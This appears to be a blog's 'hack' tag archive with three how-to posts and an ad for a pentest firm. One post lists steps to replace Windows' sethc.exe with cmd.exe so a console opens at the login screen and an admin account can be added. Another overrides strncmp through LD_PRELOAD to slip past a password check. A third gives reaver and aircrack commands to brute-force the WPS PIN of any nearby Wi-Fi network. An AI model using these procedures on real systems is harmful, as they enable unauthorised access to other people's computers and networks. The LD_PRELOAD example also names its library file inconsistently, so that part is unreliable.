Tag Archives: hack

restore admins permissions in windows 8.1

1) download latest ubuntu from ubuntu.com
2) dd if=ubuntu_image.iso of=/dev/usb_device bs=8M
3) boot from usb with ubuntu
4) open terminal
5) ntfsfix /dev/drive_with_windows
6) mount -t ntfs-3g -o remove_hiberfile /dev/drive_with_windows /mnt/hdd
7) cd /mnt/hdd/Windows/System32
8) cp sethc.exe sethc.exe.orig
9) cp cmd.exe sethc.exe
10) reboot to windows
11) in the login screen click «shift» button 5 times
12) in appeared console type «mmc»
13) add user
14) add user to administration group

You're welcome!

IT Security Brothers (http://itsb.pro)

Hi guys, I would like to present you our new project IT Security Brothers http://itsb.pro
We provide pentest, consultations and IT outsourcing services.
Feel free to hire us for IT jobs.

How to use LD_PRELOAD for cracking applications

How to use LD_PRELOAD for cracking applications.
test.cpp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
#include<stdio.h>
#include<stdlib.h>
#include<cstring>
#include<iostream>
using namespace std;

int main()
{
  char *pre_pass = "a382fbe8e8f087352e250561d724c0a";
  char *salt =     "1qazxcvfdswer435tgbnhy67ujmkdfg";
  char pass[32];
  for(int i = 0; i < 32; i++)
  {
    int a = pre_pass[i];
    int b = salt[i];
    int c = (a + b)/2;
    pass[i] = c;
  }
  char user_input[32];
  cout << "Enter your password's md5 hash for enter to root access level" << endl;
  cout << "> ";
  cin.width(32);
  cin >> user_input;
  if ( strncmp( pass, user_input, 32)==0 )
    {
      cout <<  "Secret is " << pass << endl;
    }
  else
    {
      cout << "Access denied, fucking looser" << endl;
    }
  return 1;
}

Compile it with g++:
g++ test.cpp -o test

try to get pass ^_^
./test

1
2
3
Enter your password's md5 hash for enter to root access level
> asd
Access denied, fucking looser

How to hack it ? LD_PRELOAD is answer!

Let's take a look at code, we see that we have to get zero in the return value of strncmp, let's do it !
strncmp_lib.c

1
2
3
4
int strncmp(const char * string1, const char * string2, int num )
{
return 0;
}

compite it with gcc:
gcc -Wall -O2 -fpic -shared -ldl -o strncmp_lib.so strncmp_lib.c

and run:
LD_PRELOAD="./strcmp_lib.so" ./test

1
2
3
Enter your password's md5 hash for enter to root access level
> asd
Secret is IRLVobmOdUnJU535SfJQLW64lPOOcKd

Howto hack WPS in wi-fi networks

Install reaver from here

Install air crack tools here

Or install it from standard repo, in ubuntu like

apt-get install aircrack-ng

for the next type
iwconfig

find your wireless interface, in ubuntu like wlan0.
ifconfig wlan0 up

Next command airmon-ng start wlan0. It will make new interface mon0 for monitor mode.

airodump-ng -i mon0
View all around wifi networks and choose one to hack. Remember channel and mac address.
CTRL+C

./reaver -b -c -vv

Then wait for program will find needed wpa key with pin.
It will be bruted not longer than 20 hours.